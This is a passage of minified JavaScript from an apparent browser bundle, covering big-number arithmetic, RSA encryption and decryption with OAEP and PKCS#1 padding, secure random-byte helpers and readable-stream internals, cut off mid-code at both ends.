A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},8064:(Pe,we,de)=>{var ie=de(3262),j=de(7489),$=de(5174),ae=de(3355),I=de(2005),Q=de(2161),F=de(623),E=de(265).Buffer;Pe.exports=function(M,p,D){var w;w=M.padding?M.padding:D?1:4;var O,x=ie(M),S=x.modulus.byteLength();if(p.length>S||new ae(p).cmp(x.modulus)>=0)throw new Error("decryption error");O=D?F(new ae(p),x):I(p,x);var U=E.alloc(S-O.length);if(O=E.concat([U,O],S),4===w)return function g(y,M){var p=y.modulus.byteLength(),D=Q("sha1").update(E.alloc(0)).digest(),w=D.length;if(0!==M[0])throw new Error("decryption error");var x=M.slice(1,w+1),S=M.slice(w+1),O=$(x,j(S,w)),U=$(S,j(O,p-w-1));if(function _(y,M){y=E.from(y),M=E.from(M);var p=0,D=y.length;y.length!==M.length&&(p++,D=Math.min(y.length,M.length));for(var w=-1;++w<D;)p+=y[w]^M[w];return p}(D,U.slice(0,w)))throw new Error("decryption error");for(var K=w;0===U[K];)K++;if(1!==U[K++])throw new Error("decryption error");return U.slice(K)}(x,O);if(1===w)return function b(y,M,p){for(var D=M.slice(0,2),w=2,x=0;0!==M[w++];)if(w>=M.length){x++;break}var S=M.slice(2,w-1);if(("0002"!==D.toString("hex")&&!p||"0001"!==D.toString("hex")&&p)&&x++,S.length<8&&x++,x)throw new Error("decryption error");return M.slice(w)}(0,O,D);if(3===w)return O;throw new Error("unknown padding")}},1599:(Pe,we,de)=>{var ie=de(3262),j=de(2419),$=de(2161),ae=de(7489),I=de(5174),Q=de(3355),F=de(623),E=de(2005),g=de(265).Buffer;Pe.exports=function(p,D,w){var x;x=p.padding?p.padding:w?1:4;var O,S=ie(p);if(4===x)O=function b(M,p){var D=M.modulus.byteLength(),w=p.length,x=$("sha1").update(g.alloc(0)).digest(),S=x.length,O=2*S;if(w>D-O-2)throw new Error("message too long");var U=g.alloc(D-w-O-2),K=D-S-1,ee=j(S),se=I(g.concat([x,U,g.alloc(1,1),p],K),ae(ee,K)),ve=I(ee,ae(se,S));return new Q(g.concat([g.alloc(1),ve,se],D))}(S,D);else if(1===x)O=function _(M,p,D){var S,w=p.length,x=M.modulus.byteLength();if(w>x-11)throw new Error("message too long");return S=D?g.alloc(x-w-3,255):function y(M){for(var S,p=g.allocUnsafe(M),D=0,w=j(2*M),x=0;D<M;)x===w.length&&(w=j(2*M),x=0),(S=w[x++])&&(p[D++]=S);return p}(x-w-3),new Q(g.concat([g.from([0,D?1:2]),S,g.alloc(1),p],x))}(S,D,w);else{if(3!==x)throw new Error("unknown padding");if((O=new Q(D)).cmp(S.modulus)>=0)throw new Error("data too long for modulus")}return w?E(O,S):F(O,S)}},623:(Pe,we,de)=>{var ie=de(3355),j=de(265).Buffer;Pe.exports=function $(ae,I){return j.from(ae.toRed(ie.mont(I.modulus)).redPow(new ie(I.publicExponent)).fromRed().toArray())}},5174:Pe=>{Pe.exports=function(de,ie){for(var j=de.length,$=-1;++$<j;)de[$]^=ie[$];return de}},2419:(Pe,we,de)=>{"use strict";var ie=de(5486),j=65536,I=de(265).Buffer,Q=global.crypto||global.msCrypto;Pe.exports=Q&&Q.getRandomValues?function F(E,g){if(E>4294967295)throw new RangeError("requested too many random bytes");var b=I.allocUnsafe(E);if(E>0)if(E>j)for(var _=0;_<E;_+=j)Q.getRandomValues(b.slice(_,_+j));else Q.getRandomValues(b);return"function"==typeof g?ie.nextTick(function(){g(null,b)}):b}:function ae(){throw new Error("Secure random number generation is not supported by this browser.\nUse Chrome, Firefox or Internet Explorer 11")}},3478:(Pe,we,de)=>{"use strict";var ie=de(5486);function j(){throw new Error("secure random number generation not supported by this browser\nuse chrome, FireFox or Internet Explorer 11")}var $=de(265),ae=de(2419),I=$.Buffer,Q=$.kMaxLength,F=global.crypto||global.msCrypto,E=Math.pow(2,32)-1;function g(p,D){if("number"!=typeof p||p!=p)throw new TypeError("offset must be a number");if(p>E||p<0)throw new TypeError("offset must be a uint32");if(p>Q||p>D)throw new RangeError("offset out of range")}function b(p,D,w){if("number"!=typeof p||p!=p)throw new TypeError("size must be a number");if(p>E||p<0)throw new TypeError("size must be a uint32");if(p+D>w||p>Q)throw new RangeError("buffer too small")}function y(p,D,w,x){if(ie.browser){var O=new Uint8Array(p.buffer,D,w);return F.getRandomValues(O),x?void ie.nextTick(function(){x(null,p)}):p}if(!x)return ae(w).copy(p,D),p;ae(w,function(K,ee){if(K)return x(K);ee.copy(p,D),x(null,p)})}F&&F.getRandomValues||!ie.browser?(we.randomFill=function _(p,D,w,x){if(!(I.isBuffer(p)||p instanceof global.Uint8Array))throw new TypeError('"buf" argument must be a Buffer or Uint8Array');if("function"==typeof D)x=D,D=0,w=p.length;else if("function"==typeof w)x=w,w=p.length-D;else if("function"!=typeof x)throw new TypeError('"cb" argument must be a function');return g(D,p.length),b(w,D,p.length),y(p,D,w,x)},we.randomFillSync=function M(p,D,w){if(void 0===D&&(D=0),!(I.isBuffer(p)||p instanceof global.Uint8Array))throw new TypeError('"buf" argument must be a Buffer or Uint8Array');return g(D,p.length),void 0===w&&(w=p.length-D),b(w,D,p.length),y(p,D,w)}):(we.randomFill=j,we.randomFillSync=j)},3749:Pe=>{"use strict";var de={};function ie(Q,F,E){E||(E=Error);var b=function(_){function y(M,p,D){return _.call(this,function g(_,y,M){return"string"==typeof F?F:F(_,y,M)}(M,p,D))||this}return function we(Q,F){Q.prototype=Object.create(F.prototype),Q.prototype.constructor=Q,Q.__proto__=F}(y,_),y}(E);b.prototype.name=E.name,b.prototype.code=Q,de[Q]=b}function j(Q,F){if(Array.isArray(Q)){var E=Q.length;return Q=Q.map(function(g){return String(g)}),E>2?"one of ".concat(F," ").concat(Q.slice(0,E-1).join(", "),", or ")+Q[E-1]:2===E?"one of ".concat(F," ").concat(Q[0]," or ").concat(Q[1]):"of ".concat(F," ").concat(Q[0])}return"of ".concat(F," ").concat(String(Q))}ie("ERR_INVALID_OPT_VALUE",function(Q,F){return'The value "'+F+'" is invalid for option "'+Q+'"'},TypeError),ie("ERR_INVALID_ARG_TYPE",function(Q,F,E){var g,b;if("string"==typeof F&&function $(Q,F,E){return Q.substr(!E||E<0?0:+E,F.length)===F}(F,"not ")?(g="must not be",F=F.replace(/^not /,"")):g="must be",function ae(Q,F,E){return(void 0===E||E>Q.length)&&(E=Q.length),Q.substring(E-F.length,E)===F}(Q," argument"))b="The ".concat(Q," ").concat(g," ").concat(j(F,"type"));else{var _=function I(Q,F,E){return"number"!=typeof E&&(E=0),!(E+F.length>Q.length)&&-1!==Q.indexOf(F,E)}(Q,".")?"property":"argument";b='The "'.concat(Q,'" ').concat(_," ").concat(g," ").concat(j(F,"type"))}return b+". Received type ".concat(typeof E)},TypeError),ie("ERR_STREAM_PUSH_AFTER_EOF","stream.push() after EOF"),ie("ERR_METHOD_NOT_IMPLEMENTED",function(Q){return"The "+Q+" method is not implemented"}),ie("ERR_STREAM_PREMATURE_CLOSE","Premature close"),ie("ERR_STREAM_DESTROYED",function(Q){return"Cannot call "+Q+" after a stream was destroyed"}),ie("ERR_MULTIPLE_CALLBACK","Callback called multiple times"),ie("ERR_STREAM_CANNOT_PIPE","Cannot pipe, not readable"),ie("ERR_STREAM_WRITE_AFTER_END","write after end"),ie("ERR_STREAM_NULL_VALUES","May not write null values to stream",TypeError),ie("ERR_UNKNOWN_ENCODING",function(Q){return"Unknown encoding: "+Q},TypeError),ie("ERR_STREAM_UNSHIFT_AFTER_END_EVENT","stream.unshift() after end event"),Pe.exports.q=de},5157:(Pe,we,de)=>{"use strict";var ie=de(5486),j=Object.keys||function(_){var y=[];for(var M in _)y.push(M);return y};Pe.exports=E;var $=de(5455),ae=de(2481);de(2270)(E,$);for(var I=j(ae.prototype),Q=0;Q<I.length;Q++){var F=I[Q];E.prototype[F]||(E.prototype[F]=ae.prototype[F])}function E(_){if(!(this instanceof E))return new E(_);$.call(this,_),ae.call(this,_),this.allowHalfOpen=!0,_&&(!1===_.readable&&(this.readable=!1),!1===_.writable&&(this.writable=!1),!1===_.allowHalfOpen&&(this.allowHalfOpen=!1,this.once("end",g)))}function g(){this._writableState.ended||ie.nextTick(b,this)}function b(_){_.end()}Object.defineProperty(E.prototype,"writableHighWaterMark",{enumerable:!1,get:function(){return this._writableState.highWaterMark}}),Object.defineProperty(E.prototype,"writableBuffer",{enumerable:!1,get:function(){return this._writableState&&this._writableState.getBuffer()}}),Object.defineProperty(E.prototype,"writableLength",{enumerable:!1,get:function(){return this._writableState.length}}),Object.defineProperty(E.prototype,"destroyed",{enumerable:!1,get:function(){return void 0!==this._readableState&&void 0!==this._writableState&&this._readableState.destroyed&&this._writableState.destroyed},set:function(y){void 0===this._readableState||void 0===this._writableState||(this._readableState.destroyed=y,this._writableState.destroyed=y)}})},8743:(Pe,we,de)=>{"use strict";Pe.exports=j;var ie=de(3148);function j($){if(!(this instanceof j))return new j($);ie.call(this,$)}de(2270)(j,ie),j.prototype._transform=function($,ae,I){I(null,$)}},5455:(Pe,we,de)=>{"use strict";var j,ie=de(5486);Pe.exports=l,l.ReadableState=z,de(8227);var _,ae=function(me,Ke){return me.listeners(Ke).length},I=de(7064),Q=de(5449).Buffer,F=("undefined"!=typeof global?global:"undefined"!=typeof window?window:"undefined"!=typeof self?self:{}).Uint8Array||function(){},b=de(4616);_=b&&b.debuglog?b.debuglog("stream"):function(){};var K,ee,se,y=de(658),M=de(3475),D=de(7456).getHighWaterMark,w=de(3749).q,x=w.ERR_INVALID_ARG_TYPE,S=w.ERR_STREAM_PUSH_AFTER_EOF,O=w.ERR_METHOD_NOT_IMPLEMENTED,U=w.ERR_STREAM_UNSHIFT_AFTER_END_EVENT;de(2270)(l,I);var ve=M.errorOrDestroy,le=["error","close","destroy","pause","resume"];function z(ze,me,Ke){j=j||de(5157),"boolean"!=typeof Ke&&(Ke=me instanceof j),this.objectMode=!!(ze=ze||{}).objectMode,Ke&&(this.objectMode=this.objectMode||!!ze.readableObjectMode),this.highWaterMark=D(this,ze,"readableHighWaterMark",Ke),this.buffer=new y,this.length=0,this.pipes=null,this.pipesCount=0,this.flowing=null,this.ended=!1,this.endEmitted=!1,this.reading=!1,this.sync=!0,this.needReadable=!1,this.emittedReadable=!1,this.readableListening=!1,this.resumeScheduled=!1,this.paused=!0,this.emitClose=!1!==ze.emitClose,this.autoDestroy=!!ze.autoDestroy,this.destroyed=!1,this.defaultEncoding=ze.defaultEncoding||"utf8",this.awaitDrain=0,this.readingMore=!1,this.decoder=null,this.encoding=null,ze.encoding&&(K||(K=de(5741).s),this.decoder=new K(ze.encoding),this.encoding=ze.encoding)}function l(ze){if(j=j||de(5157),!(this instanceof l))return new l(ze);this._readableState=new z(ze,this,this instanceof j),this.readable=!0,ze&&("function"==typeof ze.read&&(this._read=ze.read),"function"==typeof ze.destroy&&(this._destroy=ze.destroy)),I.call(this)}function f(ze,me,Ke,rt,Ge){_("readableAddChunk",me);var ht,Qe=ze._readableState;if(null===me)Qe.reading=!1,function L(ze,me){if(_("onEofChunk"),!me.ended){if(me.decoder){var Ke=me.decoder.end();Ke&&Ke.length&&(me.buffer.push(Ke),me.length+=me.objectMode?1:Ke.length)}me.ended=!0,me.sync?h(ze):(me.needReadable=!1,me.emittedReadable||(me.emittedReadable=!0,R(ze)))}}(ze,Qe);else if(Ge||(ht=function v(ze,me){var Ke;return!function g(ze){return Q.isBuffer(ze)||ze instanceof F}(me)&&"string"!=typeof me&&void 0!==me&&!ze.objectMode&&(Ke=new x("chunk",["string","Buffer","Uint8Array"],me)),Ke}(Qe,me)),ht)ve(ze,ht);else if(Qe.objectMode||me&&me.length>0)if("string"!=typeof me&&!Qe.objectMode&&Object.getPrototypeOf(me)!==Q.prototype&&(me=function E(ze){return Q.from(ze)}(me)),rt)Qe.endEmitted?ve(ze,new U):A(ze,Qe,me,!0);else if(Qe.ended)ve(ze,new S);else{if(Qe.destroyed)return!1;Qe.reading=!1,Qe.decoder&&!Ke?(me=Qe.decoder.write(me),Qe.objectMode||0!==me.length?A(ze,Qe,me,!1):J(ze,Qe)):A(ze,Qe,me,!1)}else rt||(Qe.reading=!1,J(ze,Qe));return!Qe.ended&&(Qe.length<Qe.highWaterMark||0===Qe.length)}function A(ze,me,Ke,rt){me.flowing&&0===me.length&&!me.sync?(me.awaitDrain=0,ze.emit("data",Ke)):(me.length+=me.objectMode?1:Ke.length,rt?me.buffer.unshift(Ke):me.buffer.push(Ke),me.needReadable&&h(ze)),J(ze,me)}Object.defineProperty(l.prototype,"destroyed",{enumerable:!1,get:function(){return void 0!==this._readableState&&this._readableState.destroyed},set:function(me){!this._readableState||(this._readableState.destroyed=me)}}),l.prototype.destroy=M.destroy,l.prototype._undestroy=M.undestroy,l.prototype._destroy=function(ze,me){me(ze)},l.prototype.push=function(ze,me){var rt,Ke=this._readableState;return Ke.objectMode?rt=!0:"string"==typeof ze&&((me=me||Ke.defaultEncoding)!==Ke.encoding&&(ze=Q.from(ze,me),me=""),rt=!0),f(this,ze,me,!1,rt)},l.prototype.unshift=function(ze){return f(this,ze,null,!0,!1)},l.prototype.isPaused=function(){return!1===this._readableState.flowing},l.prototype.setEncoding=function(ze){K||(K=de(5741).s);var me=new K(ze);this._readableState.decoder=me,this._readableState.encoding=this._readableState.decoder.encoding;for(var Ke=this._readableState.buffer.head,rt="";null!==Ke;)rt+=me.write(Ke.data),Ke=Ke.next;return this._readableState.buffer.clear(),""!==rt&&this._readableState.buffer.push(rt),this._readableState.length=rt.length,this};var P=1073741824;function X(ze,me){return ze<=0||0===me.length&&me.ended?0:me.objectMode?1:ze!=ze?me.flowing&&me.length?me.buffer.head.data.length:me.length:(ze>me.highWaterMark&&(me.highWaterMark=function G(ze){return ze>=P?ze=P:(ze--,ze|=ze>>>1,ze|=ze>>>2,ze|=ze>>>4,ze|=ze>>>8,ze|=ze>>>16,ze++),ze}(ze)),ze<=me.length?ze:me.ended?me.length:(me.needReadable=!0,0))}function h(ze){var me=ze._readableState;_("emitReadable",me.needReadable,me.emittedReadable),me.needReadable=!1,me.emittedReadable||(_("emitReadable",me.flowing),me.emittedReadable=!0,ie.nextTick(R,ze))}function R(ze){var me=ze._readableState;_("emitReadable_",me.destroyed,me.length,me.ended),!me.destroyed&&(me.length||me.ended)&&(ze.emit("readable"),me.emittedReadable=!1),me.needReadable=!me.flowing&&!me.ended&&me.length<=me.highWaterMark,He(ze)}function J(ze,me){me.readingMore||(me.readingMore=!0,ie.nextTick(Z,ze,me))}function Z(ze,me){for(;!me.reading&&!me.ended&&(me.length<me.highWaterMark||me.flowing&&0===me.length);){var Ke=me.length;if(_("maybeReadMore read 0"),ze.read(0),Ke===me.length)break}me.readingMore=!1}function Ie(ze){var me=ze._readableState;me.readableListening=ze.listenerCount("readable")>0,me.resumeScheduled&&!me.paused?me.flowing=!0:ze.listenerCount("data")>0&&ze.resume()}function Ae(ze){_("readable nexttick read 0"),ze.read(0)}function Xe(ze,me){_("resume",me.reading),me.reading||ze.read(0),me.resumeScheduled=!1,ze.emit("resume"),He(ze),me.flowing&&!me.reading&&ze.read(0)}function He(ze){var me=ze._readableState;for(_("flow",me.flowing);me.flowing&&null!==ze.read(););}function Be(ze,me){return 0===me.length?null:(me.objectMode?Ke=me.buffer.shift():!ze||ze>=me.length?(Ke=me.decoder?me.buffer.join(""):1===me.buffer.length?me.buffer.first():me.buffer.concat(me.length),me.buffer.clear()):Ke=me.buffer.consume(ze,me.decoder),Ke);var Ke}function qe(ze){var me=ze._readableState;_("endReadable",me.endEmitted),me.endEmitted||(me.ended=!0,ie.nextTick(De,me,ze))}function De(ze,me){if(_("endReadableNT",ze.endEmitted,ze.length),!ze.endEmitted&&0===ze.length&&(ze.endEmitted=!0,me.readable=!1,me.emit("end"),ze.autoDestroy)){var Ke=me._writableState;(!Ke||Ke.autoDestroy&&Ke.finished)&&me.destroy()}}function Ve(ze,me){for(var Ke=0,rt=ze.length;Ke<rt;Ke++)if(ze[Ke]===me)return Ke;return-1}l.prototype.read=function(ze){_("read",ze),ze=parseInt(ze,10);var me=this._readableState,Ke=ze;if(0!==ze&&(me.emittedReadable=!1),0===ze&&me.needReadable&&((0!==me.highWaterMark?me.length>=me.highWaterMark:me.length>0)||me.ended))return _("read: emitReadable",me.length,me.ended),0===me.length&&me.ended?qe(this):h(this),null;if(0===(ze=X(ze,me))&&me.ended)return 0===me.length&&qe(this),null;var Ge,rt=me.needReadable;return _("need readable",rt),(0===me.length||me.length-ze<me.highWaterMark)&&_("length less than watermark",rt=!0),me.ended||me.reading?_("reading or ended",rt=!1):rt&&(_("do read"),me.reading=!0,me.sync=!0,0===me.length&&(me.needReadable=!0),this._read(me.highWaterMark),me.sync=!1,me.reading||(ze=X(Ke,me))),null===(Ge=ze>0?Be(ze,me):null)?(me.needReadable=me.length<=me.highWaterMark,ze=0):(me.length-=ze,me.awaitDrain=0),0===me.length&&(me.ended||(me.needReadable=!0),Ke!==ze&&me.ended&&qe(this)),null!==Ge&&this.emit("data",Ge),Ge},l.prototype._read=function(ze){ve(this,new O("_read()"))},l.prototype.pipe=function(ze,me){var Ke=this,rt=this._readableState;switch(rt.pipesCount){case 0:rt.pipes=ze;break;case 1:rt.pipes=[rt.pipes,ze];break;default:rt.pipes.push(ze)}rt.pipesCount+=1,_("pipe count=%d opts=%j",rt.pipesCount,me);var Qe=me&&!1===me.end||ze===ie.stdout||ze===ie.stderr?Le:mt;function mt(){_("onend"),ze.end()}rt.endEmitted?ie.nextTick(Qe):Ke.once("end",Qe),ze.on("unpipe",function ht($e,st){_("onunpipe"),$e===Ke&&st&&!1===st.hasUnpiped&&(st.hasUnpiped=!0,function xe(){_("cleanup"),ze.removeListener("close",Oe),ze.removeListener("finish",Te),ze.removeListener("drain",lt),ze.removeListener("error",Je),ze.removeListener("unpipe",ht),Ke.removeListener("end",mt),Ke.removeListener("end",Le),Ke.removeListener("data",We),ft=!0,rt.awaitDrain&&(!ze._writableState||ze._writableState.needDrain)&&lt()}())});var lt=function ue(ze){return function(){var Ke=ze._readableState;_("pipeOnDrain",Ke.awaitDrain),Ke.awaitDrain&&Ke.awaitDrain--,0===Ke.awaitDrain&&ae(ze,"data")&&(Ke.flowing=!0,He(ze))}}(Ke);ze.on("drain",lt);var ft=!1;function We($e){_("ondata");var st=ze.write($e);_("dest.write",st),!1===st&&((1===rt.pipesCount&&rt.pipes===ze||rt.pipesCount>1&&-1!==Ve(rt.pipes,ze))&&!ft&&(_("false write response, pause",rt.awaitDrain),rt.awaitDrain++),Ke.pause())}function Je($e){_("onerror",$e),Le(),ze.removeListener("error",Je),0===ae(ze,"error")&&ve(ze,$e)}function Oe(){ze.removeListener("finish",Te),Le()}function Te(){_("onfinish"),ze.removeListener("close",Oe),Le()}function Le(){_("unpipe"),Ke.unpipe(ze)}return Ke.on("data",We),function ye(ze,me,Ke){if("function"==typeof ze.prependListener)return ze.prependListener(me,Ke);ze._events&&ze._events[me]?Array.isArray(ze._events[me])?ze._events[me].unshift(Ke):ze._events[me]=[Ke,ze._events[me]]:ze.on(me,Ke)}(ze,"error",Je),ze.once("close",Oe),ze.once("finish",Te),ze.emit("pipe",Ke),rt.flowing||(_("pipe 